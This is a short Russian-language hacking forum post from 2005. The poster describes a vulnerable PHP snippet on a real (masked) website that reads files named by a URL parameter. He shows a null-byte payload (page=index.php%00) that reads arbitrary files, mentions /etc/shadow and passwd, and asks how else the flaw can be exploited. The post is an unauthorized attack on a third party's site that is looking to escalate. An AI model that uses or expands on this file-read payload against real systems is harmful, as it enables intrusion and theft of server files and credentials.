
24.12.2005, 23:19
|
|
Новичок
Регистрация: 20.04.2005
Сообщений: 9
Провел на форуме: 16469
Репутация:
0
|
|
%00 в сайте
Прива всем!
Нашел сайт, который читает информацию из файлов так:
http:/*.*/index.php?page=now
<?
$f = fopen ("$page.txt","r+");
while (!feof($f))
{
$s = fgets($f,255);
echo $s;
}
?>
Используюя багу (нулл-байт [%00]) я могу читать любые файлы (http:/*.*/index.php?page=index.php%00 - выведет index.php на экран)
А что нить кроме чтения файлов с этого можно поиметь?
Чтение etc/shadow, passwd не предлагать!
{Hack detected. Contact the support.}
Последний раз редактировалось wsr; 24.12.2005 в 23:27..
|
|
|